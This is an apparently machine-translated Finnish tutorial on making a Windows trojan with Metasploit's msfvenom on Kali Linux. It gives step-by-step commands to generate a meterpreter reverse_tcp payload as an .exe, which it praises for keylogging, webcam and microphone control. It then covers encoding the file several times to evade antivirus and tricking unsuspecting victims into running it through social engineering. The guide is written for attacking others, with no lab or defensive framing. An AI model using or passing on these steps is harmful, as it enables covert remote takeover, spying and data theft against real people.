Kuinka luoda troijalainen Virus Kali Linuxissa 5

Huomautus: Jos sinulla ei ole Kali Linuxia, voit ostaa valmiiksi valmiin käynnistämään USB: n Kali Linuxilla kaupastamme tai voit ostaa Kali Linuxin Amazonista.

tässä artikkelissa käytämme yhtä Kali Linuxin laajasta hakkerointityökaluvalikoimasta troijalaisen luomiseen (tunnetaan myös nimellä RAT (Etäkäyttötyökalu) hakkerointipiireissä). Riippuen työkaluista, joita käytämme, voimme päästä käsiksi uhrin tiedostoihin ja järjestelmäprosesseihin, mukaan lukien kyky tallentaa näppäilyjä tai ottaa kuvakaappaus Web-kameran kautta.

nopea esikatselu tulevasta

  • päivitämme Kali Linux – Kali Linuxin ja sen työkalut kasvavat ja kehittyvät jatkuvasti. Säännöllinen päivittäminen on hyvä käytäntö.
  • avaa exploit-ohjelmisto-Tässä opetusohjelmassa käytämme Metasploit-ohjelmistoa, joka luo troijalaisia tiedostoja ja antaa sinulle takaoven uhrin tietokoneelle, kun he suorittavat saastuneen tiedoston. Metasploit on esiasennettuna kaikkiin Kali-versioihin, mikä helpottaa tätä vaihetta.
  • valitse hyötykuormamme-Metasploit sisältää pitkän luettelon hyötykuormista, joista jotkut soveltuvat paremmin erilaisiin tilanteisiin kuin toiset. Valitsemme monipuolisen ja tehokkaan hyötykuorman windows-koneen hakkerointiin.
  • Mukauta hyötykuormaamme – hyötykuorma tarvitsee tietoja, kuten IP-osoitteemme ja kuunteluportin, kun luomme sen.
  • luo hyötykuorma – kun annamme kaikki tietomme hyötykuormalle, meidän on luotava se a: na .exe-tiedosto.
  • salaa hyötykuorma – virustorjuntaohjelmat saattavat napata salaamattoman hyötykuorman. Salaamalla sen vähennämme virustorjunnan mahdollisuutta.

Vaihe 1: Päivitä ja päivitä Kali Linux

sinun pitäisi päivittää Kali Linux säännöllisesti. Jos et ole päivittänyt vähään aikaan tai olet juuri käynnistänyt sen, nyt on hyvä aika päivittää.

avaa pääte klikkaamalla yläreunassa olevaa ikkunaa ja kirjoita:

sudo apt-get update

seuraava, Kirjoita:

sudo apt-get upgrade

tämän pitäisi päivittää järjestelmäsi uusimpaan versioon, varmistaen, että kaikki työkalut toimivat juuri niin kuin pitääkin. Nyt voimme aloittaa.

Vaihe 2: Open exploit software

tässä artikkelissa käytämme metasploit Frameworkia. Metasploit on kaikkiin Kali Linux-koneisiin esiasennettu ohjelmisto, jonka avulla voit luoda mukautettuja hyötykuormia, jotka linkittyvät takaisin tietokoneellesi uhrin tietokoneelta. Tässä tapauksessa hyötykuorma on meidän rotta. Käyttämällä metasploit, hakkeri voi luoda hyötykuorman, tallentaa sen tiedostoon, ja huijata jotkut pahaa aavistamaton käyttäjä klikkaamalla sitä kautta social engineering. Jos et tiedä, mitä tarkoitamme sosiaalitekniikalla, ajattele kuuluisaa nigerialaista Prinssihuijausta. Ainoa ero tässä tapauksessa on se, että sen sijaan, että hakkeri huijaisi käyttäjää antamaan hänelle pankkitilitietoja, hakkeri huijaa käyttäjää klikkaamaan haitallista tiedostoa.

avaa pääte ja kirjoita kohtaan

msfvenom

tämä näyttää luettelon komennoista, jotka ovat käytettävissä metasploit-palvelussa. Jos haluat nähdä käytettävissä olevat hyötykuormat, Kirjoita

msfvenom -l payloads

tämä listaa kaikki käytettävissä olevat hyötykuormat, joita voit käyttää. Kuten näette, niitä on paljon. Jos haluat nähdä muita vaihtoehtoja, voit kirjoittaa mitä tahansa muita vaihtoehtoja lueteltu ruudulla. Näet vaihtoehtoja, kuten alustat, anturit (joita käsitellään myöhemmin tässä artikkelissa), salausavaimet, huonot merkit ja monet muut.

vaihe 2.5: korjaa mahdolliset virheet

kun annat komennon hyötykuormien luettelointiin, saatat nähdä tämän virheen:

jos näet tämän, se tarkoittaa, että bundler on joko perustettu väärin tai sitä ei ole päivitetty.

Huomaa: Jos et nähnyt tätä virhettä, voit siirtyä vaiheeseen 3.

jos haluat korjata tämän, Vaihda nykyinen kansio (tiedosto) usr / share / metasploit-framework-muotoon kirjoittamalla:

cd /usr/share/metasploit-framework/

juurihakemistosta. Jos teet virheen, voit kirjoittaa

cd ..

palataksesi edelliseen hakemistoon tai kirjoittaa mihin tahansa hakemistoon cd: n jälkeen mennäksesi sinne.

nyt kun olemme metasploit-framework-hakemistossa, Kirjoita

gem install bundler

asentaaksesi niputtajan, kirjoita sitten

bundle install

jos Niputtaja ei ole oikea versio, sinun pitäisi saada viesti, jossa kerrotaan mikä versio asennetaan (tässä tapauksessa se oli 1.17.3). Tyyppi:

gem install bundler:

ja sitten Tyyppi:

gem update –system

kaiken tämän jälkeen kaiken pitäisi toimia täydellisesti.

Kirjoita

cd /root

palataksesi juurihakemistoon.

Vaihe 3: Valitse hyötykuormamme

Tyyppi

msfvenom -l payloads

nähdäksesi hyötykuormaluettelon.

suosittelemme windows/meterpreter/reverse_tcp: n käyttöä. Sen avulla voit keylog, haistella tietoja, ja hallita tartunnan saaneen tietokoneen tiedostojärjestelmä, mikrofoni, ja webcam. Se on yksi monipuolisimmista, invasiivisia, ja tuhoisa hyötykuormia metasploit.

Vaihe 4: muokata hyötykuorma

nyt kun meillä on hyötykuorma, voimme tarkistaa mitä vaihtoehtoja meillä on. Tyyppi:

msfvenom –list-options -p 

nähdä, mitä voimme muuttaa noin hyödyntää ja missä hyödyntää lähettää tiedot.

näemme, että LHOST on tyhjä; tämä on, jos hyödyntää lähettää tietoja saastuneen laitteen. Useimmissa tapauksissa tämä on ip-osoitteesi.

löytääksesi ip-osoitteesi, Kirjoita

ifconfig

päätteeseen saadaksesi tämän ikkunan. Ip-osoitteesi on sanan ” inet.”Jos olet yhteydessä internetiin Ethernetin kautta, käytä IP-osoitetta osoitteessa eth0; jos olet yhteydessä langattomasti, käytä yhtä osoitteessa wlan0.

ip-Osoitteemme on lhost-parametrimme.

Vaihe 5: Luo troijalainen

nyt kun meillä on hyötykuorma, ip-osoite ja portin numero, meillä on kaikki tarvitsemamme tiedot. Kirjoita:

msfvenom -p LHOST= LPORT= -f > 

tiedostotyypin tulee olla exe ja polun tulee olla tiedostonimi (varmista, että tiedostopääte nimen jälkeen ja Tiedostotyyppi täsmäävät). Varmista erityisesti, ettet paina enteriä ennen kuin laitat ”>”, koska tämä ajaa haavoittuvuutta omalla laitteellasi.

jos katsomme tiedostojamme käyttäen ls: ää, huomaamme, että uusi tiedostomme ponnahtaa esiin.

Vaihe 6: Salaa troijalainen

koska windows/meterpreter / reverse_tcp on yleinen haavoittuvuus, monet virustorjuntaohjelmat havaitsevat sen. Voimme kuitenkin salata ohjelman niin, että virustorjunta ei saa sitä kiinni. Mukana metasploit on pitkä lista salauslaitteita. Tyyppi:

msfvenom -l encoders to see a list of them.

Once you choose the encryption you want (we recommend x86/shikata_ga_nai), you can encrypt it multiple times when you type in the command to make the exploit. Encrypting the file multiple times helps prevent antivirus programs from catching your virus. Type in:

msfvenom -p LHOST= LPORT= -e -i -f > 

nyt olemme tehneet troijalaisen viruksen, joka on salattu ja vaikeampi tunnistaa virustorjuntaohjelmalla. Jos kirjoitamme ’l’ katsoaksemme tiedostojamme, näemme…

uusi troijalainen on tiedostoissamme.

Vaihe 7: Avaa Meterpreter-istunto, jotta troijalainen voi muodostaa yhteyden takaisin sinuun

tässä vaiheessa, katso kuinka Meterpreteriä käytetään troijalaista ohjattaessa. Varmista, että käytät ip-osoitettasi (Kali-tietokoneen ip-osoite ja se, jota käytit troijalaisen luomisessa) ja käytät myös samaa hyödyntämistä: windows / meterpreter / reverse_tcp

If you are looking to create a troijalainen for Mac OSX

  • How to use Macphish on Kali Linux to create a troijalainen on a Mac
  • How to hack a Mac using a troijalainen in Kali Linux

lopuksi:

  • päivitimme Kali Linuxin, jotta kaikki toimisi.
  • loimme hyötykuorman metasploitissa IP-osoitteemme ja kuunteluporttimme parametreina.
  • odotimme uhrin ajavan troijalaisen, joka puolestaan mahdollisti etäyhteyden uhrin tietokoneeseen ja tiedostojärjestelmään.

jos haluat kokeilla tätä itse, mutta sinulla ei ole käytössäsi Kali Linuxia, voit ostaa Kali Linuxin sisältävän Live-USB: n täältä.

Write a Comment

Sähköpostiosoitettasi ei julkaista.